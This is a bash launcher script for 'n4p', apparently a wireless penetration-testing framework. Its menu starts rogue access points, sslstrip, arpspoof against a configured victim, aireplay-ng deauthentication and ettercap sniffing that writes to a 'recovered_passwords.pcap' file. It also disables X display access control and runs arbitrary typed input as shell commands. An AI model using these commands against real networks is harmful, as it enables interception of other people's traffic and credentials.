#!/bin/bash
xhost +

#retrieve absolute path structures so we can use symlinks and config files
SOURCE="${BASH_SOURCE[0]}"
while [[ -h "$SOURCE" ]]; do # resolve $SOURCE until the file is no longer a symlink
    DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
    SOURCE="$(readlink "$SOURCE")"
    [[ $SOURCE != /* ]] && SOURCE="$SOURCE" # if $SOURCE was a relative symlink, we need to resolve it's relativeness to the path where the symlink file was located
done
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
DIR_CONF=/etc/n4p/
DIR_LOGO=/usr/share/n4p/

get_RCstatus() # What is the status from OpenRC of the service
{
    STATUS=$(/etc/init.d/$1 status | sed 's/* status: //g' | cut -d ' ' -f 2)
}

get_name() #Parse the values in the config file
{
    USE=$(grep $1 ${DIR_CONF}n4p.conf | awk -F= '{print $2}')
}

# Text color variables
TXT_BLD=$(tput bold)             # Bold
BLD_BLU=${txtbld}$(tput setaf 4) # blue
BLD_TEA=${txtbld}$(tput setaf 6) # teal
BLD_WHT=${txtbld}$(tput setaf 7) # white
PUR=$(tput setaf 5)              # purple
TXT_RST=$(tput sgr0)             # Reset
EYES=$(tput setaf 6)
AP_GATEWAY=$(grep routers ${DIR_CONF}dhcpd.conf | awk -Frouters '{print $2}' | cut -d ';' -f 1 | cut -d ' ' -f 2)
get_name "IFACE1="; IFACE1=$USE
get_name "OS="; OS=$USE
get_name "NETWORKMANAGER="; NETWORKMANAGER=$USE
get_name "OS="; OS=$USE
get_name "INTERFACE="; INTERFACE=$USE
MON="${IFACE1}mon"
FAILSAFE="th8934pjghwt74ygp"
echo "${BLD_TEA}$(cat ${DIR_LOGO}opening.logo)${TXT_RST}"

SESSIONFOLDER=/tmp/n4p/ # Set our tmp working configuration directory and then build config files
[ ! -d "$SESSIONFOLDER" ] && mkdir "$SESSIONFOLDER"; mkdir -p "$SESSIONFOLDER" "${SESSIONFOLDER}logs"

if [[ $NETWORKMANAGER == "True" ]]; then #n4p cant operate airmon and such with network manager hogging everything. We must kill it.
    if [[ $OS == "Pentoo" ]]; then
        if [[ -f /etc/init.d/NetworkManager ]]; then
            get_RCstatus "NetworkManager"
            [[ $STATUS != 'stoped' ]] && sudo /etc/init.d/NetworkManager stop
        else
            echo "Error in Config file. NetworkManager does not appear to be present."
        fi
    else # were not using pentoo kill nm for systemd
        if [[ -f /etc/init.d/network-manager ]]; then
            sudo service network-manager stop
        fi
    fi
elif [[ $OS == "Pentoo" ]]; then
  if [[ -e /etc/init.d/net.$IFACE1 ]]; then
    #echo "$INFO Getting status of $IFACE1"
    get_RCstatus "net.$IFACE1"
    [[ $STATUS == 'started' ]] && /etc/init.d/net.$IFACE1 stop
  fi
fi

trap killemAll INT HUP;

cut_choice() #This function parses the input commands in advanced mode for use with pre defined custom interactions
{
    CHOICE=${CHOICE:4:${#CHOICE}}
}

menu()
{
    if [[ $INTERFACE == "Basic" ]]; then
      echo -e "\n"
      echo -e "${BLD_WHT}
                /\#/\         '\\-//\`       |.===. '   
                /(${TXT_RST}${EYES}o o${TXT_RST}${BLD_WHT})\        (${EYES}o o${TXT_RST}${BLD_WHT})        ${TXT_RST}${PUR}{}${TXT_RST}${EYES}o o${TXT_RST}${PUR}{}${TXT_RST}${BLD_WHT}  
      +======ooO--(_)--Ooo-ooO--(_)--Ooo-ooO--(_)--Ooo======+
      | ${TXT_RST}${BLD_TEA}1${TXT_RST}${BLD_WHT})  Set devices for use and attack                  |
      | ${TXT_RST}${BLD_TEA}2${TXT_RST}${BLD_WHT})  Perform wifi radius recon                       |
      | ${TXT_RST}${BLD_TEA}3${TXT_RST}${BLD_WHT})  Airodump-ng .cap file or Wash network           |
      | ${TXT_RST}${BLD_TEA}4${TXT_RST}${BLD_WHT})  Crack .cap and hashes                           |
      | ${TXT_RST}${BLD_TEA}5${TXT_RST}${BLD_WHT})  Attack or Launch AP                             |
      | ${TXT_RST}${BLD_TEA}6${TXT_RST}${BLD_WHT})  Enumerate the Firewall ${TXT_RST}${BLD_TEA}(Run this option last)${TXT_RST}${BLD_WHT}   |
      | ${TXT_RST}${BLD_TEA}7${TXT_RST}${BLD_WHT})  Kick everyone                                   |
      | ${TXT_RST}${BLD_TEA}8${TXT_RST}${BLD_WHT})  Start Ettercap Sniffer                          |
      | ${TXT_RST}${BLD_TEA}0${TXT_RST}${BLD_WHT})  EXIT                                            |
      +=====================================================+${TXT_RST}"
      read -p "Option: " CHOICE
    else
        echo ""
        read -p "${BLD_WHT}N4P${TXT_RST}${BLD_TEA}$ ${TXT_RST}" CHOICE
    fi

    if [[ $CHOICE == "advanced" || $CHOICE == "Advanced" ]]; then #Find out what the user wants then recall the menu arrangement based on this.
        INTERFACE="Advanced"
        menu
    elif [[ $CHOICE == "simple" || $CHOICE == "basic" || $CHOICE == "Simple" || $CHOICE == "Basic" ]]; then
        INTERFACE="Basic"
        menu
    #The current defined menu options are compleated
    ################################################################################################################################################
    #Now we look for user actions
    elif [[ $CHOICE == 0 || $CHOICE == "quit" || $CHOICE == "exit" ]]; then
        killemAll $FAILSAFE
    elif [[ $CHOICE == "?" || $CHOICE == "help" || $CHOICE == "Help" ]]; then
        echo "Help! Commands and options are."
        echo "list modules | show modules"
        echo "use [ atom ]"
        echo "show options"
        echo "run"
        echo "basic | simple"
        echo "advanced"
        echo "Any basic mode menu option number. 0-9"
        echo "Any bash command"
    elif [[ $CHOICE == 1 ]]; then
        sudo $EDITOR ${DIR_CONF}n4p.conf
    elif [[ $CHOICE == 2 ]]; then
        sudo xterm -bg black -fg DodgerBlue1 -T "Recon" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./recon ; bash\"" &>/dev/null &
        #sudo xterm -bg black -fg DodgerBlue1 -T "Recon" -geometry 90x20 -e ./modules/recon &>/dev/null &
    elif [[ $CHOICE == 3 ]]; then
        if [[ $ATTACK == "WPS" ]]; then
            sudo xterm -bg black -fg DodgerBlue1 -T "Wash" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./wash ; bash\"" &>/dev/null &
        else
            sudo xterm -bg black -fg DodgerBlue1 -T "Dump cap" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./dump ; bash\"" &>/dev/null &
        fi
    elif [[ $CHOICE == 4 ]]; then
        sudo xterm -bg black -fg DodgerBlue1 -T "Cracking" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./cracking ; bash\"" &>/dev/null &
    elif [[ $CHOICE == 5 ]]; then
        get_name "ATTACK="; ATTACK=$USE
        if [[ $ATTACK == "Handshake" || $ATTACK == "Karma" || -z $ATTACK ]]; then
            sudo xterm -bg black -fg DodgerBlue1 -T "Airbase" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./airbase ; bash\"" &>/dev/null &
        elif [[ $ATTACK == "WPS" ]]; then
            sudo xterm -bg black -fg DodgerBlue1 -T "Bully" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./recon ; bash\"" &>/dev/null &
        elif [[ $ATTACK == "SslStrip" ]]; then
            echo -e "SSL Strip Log File\n" > ${SESSIONFOLDER}ssl.log
            #sudo xterm -T "SSL Strip" -geometry 50x5 -e sslstrip -p -k -f lock.ico -w ${SESSIONFOLDER}ssl.log &>/dev/null &
            sudo xterm -bg black -fg DodgerBlue1 -T "SSL Strip" -geometry 50x5 -e "bash -ic \"sslstrip -p -k -f lock.ico -w ${SESSIONFOLDER}ssl.log ; bash\"" &>/dev/null &
        elif [[ $ATTACK == "WPE" ]]; then
            #sudo xterm -bg black -fg DodgerBlue1 -T "WPE" -geometry 90x20 -e ./modules/wpe  &>/dev/null &
            sudo xterm -bg black -fg DodgerBlue1 -T "WPE" -geometry 50x5 -e "bash -ic \"${DIR}/modules/./wpe ; bash\"" &>/dev/null &
        elif [[ $ATTACK == "SslStrip" ]]; then
            get_name "IFACE1="; IFACE1=$USE
            get_name "ARP_VICTIM="; ARP_VICTIM=$USE
            #sudo xterm -T "Arpspoof $IFACE1 $AP_GATEWAY" -geometry 90x15 -e arpspoof -i $IFACE1 $ARP_VICTIM &>/dev/null &
            sudo xterm -bg black -fg DodgerBlue1 -T "Bully" -geometry 90x20 -e "bash -ic \"arpspoof -i $IFACE1 $ARP_VICTIM ; bash\"" &>/dev/null &
        fi
    elif [[ $CHOICE == 6 ]]; then
        sudo xterm -bg black -fg DodgerBlue1 -T "iptables" -geometry 90x20 -e "bash -ic \"${DIR}/modules/./firewall ; bash\"" &>/dev/null &
    elif [[ $CHOICE == 7 ]]; then
        get_name "VICTIM_BSSID="; VICTIM_BSSID=$USE
        get_name "STATION="; STATION=$USE
        get_name "IFACE1="; IFACE1=$USE
        MON="${IFACE1}mon"
        sudo xterm -bg black -fg DodgerBlue1 -T "Aireplay" -geometry 90x20 -e "bash -ic \"aireplay-ng --deauth 1 -a $VICTIM_BSSID -c $STATION ${IFACE1}mon ; bash\"" &>/dev/null &
    elif [[ $CHOICE == 8 ]]; then
        get_name "BRIDGE_NAME="; BR_NAME=$USE
        get_name "AP="; AP_NAME=$USE
        get_name "BRIDGED="; BRIDGED=$USE
        [[ ! -f ${SESSIONFOLDER}recovered_passwords.pcap ]] && sudo touch ${SESSIONFOLDER}recovered_passwords.pcap
        get_name "ETTERCAP_OPTIONS="; ETTERCAP_OPTIONS=$USE
        if [[ $BRIDGED == "True" ]]; then
             sudo xterm -bg black -fg DodgerBlue1 -T "ettercap" -geometry 90x20 -e "bash -ic \"ettercap ${ETTERCAP_OPTIONS} -i ${BR_NAME} ; bash\"" &>/dev/null &
        elif [[ $AP_NAME == "AIRBASE" ]]; then
             sudo xterm -bg black -fg DodgerBlue1 -T "ettercap at0" -geometry 90x20 -e "bash -ic \"ettercap -i at0 ${ETTERCAP_OPTIONS} -w ${SESSIONFOLDER}recovered_passwords.pcap ; bash\"" &>/dev/null &
        elif [[ $AP_NAME == "HOSTAPD" ]]; then
           sudo xterm -bg black -fg DodgerBlue1 -T "ettercap $IFACE1" -geometry 90x20 -e "bash -ic \"ettercap $ETTERCAP_OPTIONS -i $IFACE1 -w ${SESSIONFOLDER}recovered_passwords.pcap ; bash\"" &>/dev/null &
        fi
    else
        ###########################################################################################################################
        # This section is all about advanced mode. We allow the user to run custom modules and interact with the shell directly
        ###########################################################################################################################
        if [[ $INTERFACE == "Advanced" ]]; then
            if [[ $CHOICE == "use"* ]]; then
                cut_choice $CHOICE
                echo "use=$CHOICE"
                if [[ ! -f ${DIR}/modules/$CHOICE ]]; then
                    echo "${BLD_TEA}You seem to be confused.${TXT_RST}"
                else
                    RUN=$CHOICE
                fi
            elif [[ $CHOICE == "run" ]]; then
                if [[ -n $CHOICE ]]; then # Check if the CHOICE is empty before trying to execute
                    sudo xterm -bg black -fg DodgerBlue1 -T "N4P Advanced runtime" -geometry 65x15 -e "bash -ic \"${DIR}/modules/./$RUN ; bash\"" &>/dev/null &
                else
                    echo "${BLD_TEA}Nothing to do!${TXT_RST}"
                fi
            elif [[ $CHOICE == "show options" ]]; then
                if [[ -n $RUN ]]; then # Check if the CHOICE is empty before trying to execute
                    grep get_name\ \" ${DIR}/modules/$RUN | cut -d '"' -f 2
                else
                    echo "${BLD_TEA}Nothing to do!${TXT_RST}"
                fi
            elif [[ $CHOICE == "list modules" || $CHOICE == "show modules" ]]; then
                printf %s "$(ls modules/)"
            #elif [[ $CHOICE = set* ]]; then #We may in future make variables dynamic from the module
            #      AP=tester
            #      cut_CHOICE $CHOICE
            #      var=$(echo "$CHOICE" | cut -d ' ' -f 1)
            #      str=$(echo "$CHOICE" | cut -d ' ' -f 2)
            #      printf $var=$str
            #      echo $AP
            else
                printf %s "$($CHOICE)"
                echo -e "\n\n"
                menu
            fi
        else
            echo "${BLD_TEA}I'm confused.${TXT_RST}"
            echo "${BLD_TEA}Why not try Advanced mode!${TXT_RST}"
        fi
    fi
    menu
}

killemAll()
{
    echo ""
    if [[ $1 != $FAILSAFE ]]; then
        clear
        menu
    else
        sudo ${DIR}/modules/./rebuild_network
        xhost -
        echo "${BLD_TEA}$(cat ${DIR_LOGO}/zed.logo)${TXT_RST}"
        exit 0
    fi
}
menu
